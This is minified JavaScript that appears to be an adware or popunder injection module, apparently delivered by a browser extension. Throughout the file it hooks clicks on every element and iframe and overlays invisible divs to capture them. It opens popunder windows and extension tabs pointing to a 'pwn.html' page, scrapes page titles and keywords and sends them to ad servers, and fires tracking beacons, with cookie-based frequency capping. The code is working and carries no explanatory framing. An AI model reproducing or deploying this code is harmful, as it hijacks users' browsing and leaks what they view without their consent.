_GPL.j(function(g,b,ha,y,m,e,k,va,wa,qb,ia,z,bb,ja,s,rb,n,xa,W,ya,A,t,sb,u,cb,ka){function L(){za(h,W,L);db(function(a,c){d=a;X||(X=!0,eb(),fb(),la(),Aa(h,W,la),Ba=ja(function(){36E5<+new m-Ca&&T(!1)},5E3))})}function la(){Ca=+new m}function T(a){X&&(g("iframe").off("mouseover",Da),M.remove(),X=!1,ha(Ba),gb(),za(h,W,la),d=void 0,F=v="",a||Aa(h,W,L),s(L,1E3*Math.max(G,w)))}function Aa(a,c,f){if(n[xa])a[xa](c,f,!1);else a.attachEvent("on"+c,f)}function fb(){Y=!0;b.ah&&b.ah(B,N);g("*").add(n).on(B,N);
Ea||(Ea=!0,g("*").add(n).on("mousedown mouseup click",Fa));g("iframe").each(function(a,c){try{g(c.contentWindow).on(B,N)}catch(f){}});Ga=ja(function(){g("iframe").each(function(a,c){c[Ha]||(c[Ha]=1,g(c).mouseover(Da))})},100);if(U)try{b.log("Attempting to pop from extension to: "+d);var a="ld893_";v&&(a+="_"+e(v),F&&(a+=","+F),a+="_");var a=a+("_"+C()),c=b.proto+b.baseCDN+"/pwn.html?u="+e(d)+"&n="+a+"&r=";"h"!=U||O?"w"!=U||O||(O=!0,ma(n,"openThatTabBitch",{url:c,isUnder:!1,attr:"z7b85_91c4"}),s(function(){O=
!1},100)):(O=!0,ma(h,"createNewTab",{url:c,focused:"true"}),ma(h.documentElement,"createNewTab",{url:c,focused:"true"}),s(function(){O=!1},100));var f=ja(function(){h.documentElement.getAttribute("z7b85_91c4")&&(ha(f),T(!0),Ia(),h.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(Ja){}}function ma(a,c,f){if(h.createEvent){var b=h.createEvent("CustomEvent");b.initCustomEvent(c,!1,!1,f);a.dispatchEvent(b)}else b=h.createEventObject(),b.detail=f,b.realType=c,a.fireEvent("ondataavailable",b)}
function H(a){a=ia.userAgent.match(bb(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function hb(){if(H("Chrome")){for(var a=0;a<ia.plugins.length;a++)if("Widevine Content Decryption Module"==ia.plugins[a].name)return!1;return!0}return!1}function eb(){M||(M=g('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),M.mouseout(function(){M.hide()}))}function Da(a){var c=g(a.target),f=c.offset();f.width=c.outerWidth();f.height=
c.outerHeight();f.display="block";M.css(f);a.stopPropagation()}function ib(a){if(d!=Ka){a=a.target||a.srcElement;for(var c="";a;){P||(P=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){c=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!d)return!1;c&&(d+="&t="+e(c.substring(0,Math.max(0,1500-d.length))));d+="&rt="+(+new m-La);P&&(d+="&data_tag="+e(P));"/"!=k.pathname&&(d+="&mk="+e(b.B64.encode(na().substring(0,Math.max(0,1500-d.length)))));d+=
Ma?"&data_sid="+e(Ma):""}b.log("Popping to: "+d);a="ld893_";v&&(a+="_"+e(v),F&&(a+=","+F),a+="_");c=a+="_"+C();Q.parentNode||(Na=Oa());if(a=Na("",1749==p?c:"_blank"))a.name=c,0.02>Math.random()?(c=""+d,-1<d.indexOf(Z)&&(c="http://"+Z+"/pclk?c="+e(v)+"&crl="+e(d)),a.location.href=c):a.location.href=d;return a}function na(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var c=[];g("title").length&&(c=c.concat(a(g("title").text())));g('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var f=
g.trim(g(this).attr("content"));f&&f.match(/^\s*[a-zA-Z0-9]/)&&(c=c.concat(a(f)))});return g.trim(function(a){var c=[];g.each(a,function(a,b){-1==g.inArray(b,c)&&c.push(b)});return c}(c).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Pa(a,c){a=(a||k.href).substr(0,1500);var f="/"!=k.pathname?na():"";a=a.replace(/:/g,"%3A");var f=f.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),Ja=b.getSubId?"&subid="+b.getSubId(aa):"",f=e(b.B64.encode(a+"::z-"+p+"-"+Qa+"::"+f)),d="&cb="+
(c||oa),d=d+("&data_fr="+(Ra(x)?"false":"true")),d=d+("&data_proto="+e(k.protocol));return b.proto+Z+"/pops?c="+f+"&a=1&ch="+e(V)+Ja+d}function za(a,c,b){if(n[ya])a[ya](c,b,!1);else a.detachEvent("on"+c,b)}function gb(){Y=!1;b.rh&&b.rh(B,N);g("*").add(n).off(B,N);g("iframe").each(function(a,c){try{g(c.contentWindow).off(B,N)}catch(b){}});ha(Ga)}function jb(a){a=a||n.event||{};if(U&&h.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}
function R(a,c){a=z(a,10);isNaN(a)&&(a=z(ba&&ba.getItem(c)||b.gc(c,10),10)||0);return a}function Ra(a){return(new m(1E3*(a||0))).toDateString()==(new m).toDateString()}function ca(){x|=0;q|=0;I|=0;var a=C(),c=q&&!Ra(x);c&&(q=0,r.set(u,q));var b=!J||a-x>=G&&q<J,a=a-I>=w;return!l&&c||b&&a}function N(a){a=a||n.event;if(!jb(a)){var c=Y&&kb(),f=c&&ib(a);if(f&&!f.closed)return T(!0),Ia(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_success&d="+e(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+
p+"&r="+999999999*Math.random(),da&&y(da),ea&&y(ea),pa=!0,Fa(a);f&&f.closed?ea||(ea=s(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+e(d)+"&location="+e(k.hostname)+"&pid="+p+"&tag="+e(P||"")+"&r="+999999999*Math.random()},1E3)):c&&(da||(da=s(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+e(d)+"&location="+e(k.hostname)+"&pid="+p+"&tag="+e(P||"")+"&r="+999999999*Math.random()},1E3)))}}function kb(){if(!r.swf)return!0;x=R(r.get(A),A);316808>Sa.score&&
(q=R(r.get(u),u));var a=Ta(r.get(t));I=R(a[S],t);return ca()}function C(){return va(new m/1E3)}function Ua(a,c,b){r.set(a,b);b=C();ba&&ba.setItem(a,b);c=z(c,10);var e=new m;e.setSeconds(e.getSeconds()+c);h.cookie=a+"="+b+";expires="+e.toUTCString()+";path=/;domain="+S}function Ia(){var a=C();Ua(A,G,a);r.set(cb,a);x=a;r.set(u,++q);w&&Ua(t,w,fa+(fa&&",")+S+":"+a)}function Ta(a){var b={},f=C(),e=[];a=(a||"").split(",");if(a.length){for(var d=0;d<a.length;++d){var g=a[d].split(":"),h=z(g[1],10);f-h<w&&
(b[g[0]]=h,e.push(g[0]+":"+h))}fa=e.join(",");r.set(t,fa)}return b}function qa(){return ca()||l?1:C()-(z(I,10)||0)<w?Infinity:q>=J?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function lb(a){"US"==b.vars.cid?ra(a,47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?ra(a,59858,88620):ra(a,49928,59858);return ca()}function ra(a,b,f){a>=b&&(G=0,a>=f&&q>=J&&(q=wa(0,
J-1)))}function Va(a){y(ga);if(!l&&1735!=p){var b=qa(),f="http://clkmon.com/adServe/banners?pid=14442&cid="+Qa+"&action=r&q=",d="/"!=k.pathname?na():"",f=f+e(d.substring(0,Math.max(0,1500-f.length)));n[oa]({url:f,score:b});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&reason="+e(a)+"&pid="+p+"&u="+e(k.hostname)+"&r="+999999999*Math.random()}}function db(a){!function f(){r.get(["frt","_GPL_oo_z7b85",A,t,u,ka],function(d){if(d.v.frt){if("1750"==p){var g=z(d.v._GPL_oo_z7b85,10)||0;if(86400>
va(new m/1E3)-g)return}Wa.getAttribute("data-openThatTabBitch")&&"t3"==b.vars.wptg&&(g=["wp_t3_c","wp_t3_t"],E=d.v[ka],E&&-1!=g.indexOf(E)||(E=g[Math.floor(Math.random()*g.length)],r.set(ka,E)),"wp_t3_t"==E&&(U="w"));Xa||(Xa=!0,b.pc(function(){Ya?Ya=!1:Y||(sa=!1,T(),L())}));n[oa]=function(b){mb(b,a)};g=C();x=R(d.v[A],A);q=R(d.v[u],u);d=Ta(d.v[t]);I=R(d[S],t);if(ca()){d=qa();ta=+new m;var k=h.createElement("script");k.src=Pa()+"&ms="+d+"&r="+g;k.onerror=function(){Va("error")};Wa.appendChild(k);(new Image).src=
"//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+e(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+p+"&r="+999999999*Math.random();y(ga);ga=s(function(){Va("time")},15E3)}else d=qa(),b.log("minScoreNeeded: "+d),Infinity>d&&!sa&&!l&&(ta=+new m,b.insertJS(Pa()+"&ms="+d+"&r="+g),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+e(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+p+"&r="+999999999*Math.random(),sa=!0),y(ua),ua=s(f,1E3*(5+wa(g,x+G,I+w)-g))}})}()}function Oa(){Q=
h.createElement("iframe");Q.style.display="none";Q.style.visibility="hidden";h.body.appendChild(Q);return Q.contentWindow.open}function Fa(a){if(pa)return a.cancelBubble=!0,a.stopPropagation&&a.stopPropagation(),a.stopImmediatePropagation&&a.stopImmediatePropagation(),a.preventDefault&&a.preventDefault(),s(function(){pa=!1},100),!1}function mb(a,c){y(ga);var d=+new m-ta;F=v="";a&&(a.crid&&(F=a.crid),a.cid&&(v=a.cid,a.url||(a.url="http://"+Z+"/click?c="+e(v),a.url+=b.getSubId?"&subid="+b.getSubId(aa):
"",a.url+=E?"&data_test="+e(E):"",a.url+="&data_fb="+(hb()?"yes":"no"),a.url+="&data_rtt="+d,a.url+="&data_proto="+e(k.protocol),a.url+="&data_ic="+(Za?"true":"false"),a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0))),l&&!a.cid&&(a.url=Ka,a.cid="xr"),d=z(a.score,10),l||0<d&&lb(d)?(La=+new m,y(ua),a.url&&a.expires&&(y($a),$a=s(function(){T(!0);L()},1E3*z(a.expires,10))),Sa={score:d,now:new m/1},c(a.url,d),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_bid&d="+e(b.gd())+
"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+p+"&r="+999999999*Math.random()):(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_nobid&d="+e(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+p+"&r="+999999999*Math.random())}var r=b.items.e6a00,h=n.document,Wa=h.body,ba=n.localStorage,nb=H("chrome"),ob=H("firefox");H("opera");var pb=H("safari");H("webkit");var V=b.item_vars["22555_ch"]||b.item_vars.ch||"",G,x,I,K=b.dt(),K=K&&K.inherited&&K.inherited.t||[],l="x"==V||-1<K.indexOf("adult")||0==
K.length&&0<g('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;l&&(-1==K.indexOf("adult_block")?V="x":(V="x-issue",l=!1));var w,aa="z7b85",Z=b.gsd&&b.gsd(aa)||"s.hklmm.com",X=!1,Ba,Ca,Y=!1,S=b.gd(),d,La=0,ta=0,$a,fa="",q=0,J,Sa={},v="",F="",ua,sa=!1,E,da,ea,ga,P,B="click";if(nb||pb)B="mousedown";else if(ob||h.all||H("trident"))B="mouseup";var ab=b.zoneid(aa,!0).split("_"),Qa=ab[0],p=ab[1]||b.vars.pid,Ma=b.vars.systemid,Ka="http://secure.xsrving.com/display?size=800x600&ch="+e(V)+"&referer="+
e(S),U=!1,O=!1,oa=b.rs(20),M,Ha=b.rs(12),Ga,Za=function(){try{return n[(n.btoa||function(a){return a})(k.hostname+"::"+(new m).toDateString())]===k.protocol}catch(a){return!1}}(),Xa=!1,Ya=!0,Q,Na=Oa(),pa=!1,Ea=!1;1797==p&&"GB"==b.vars.cid||"facebook.com"==S||(Za?(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=idlecrawler&d="+e(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+p+"&r="+999999999*Math.random():(l?(J=G=0,w=180,A+="_xr",t+="_xr",u+="_xr"):(G=360,J=4,w=360),L()))},_GPL,clearInterval,
clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
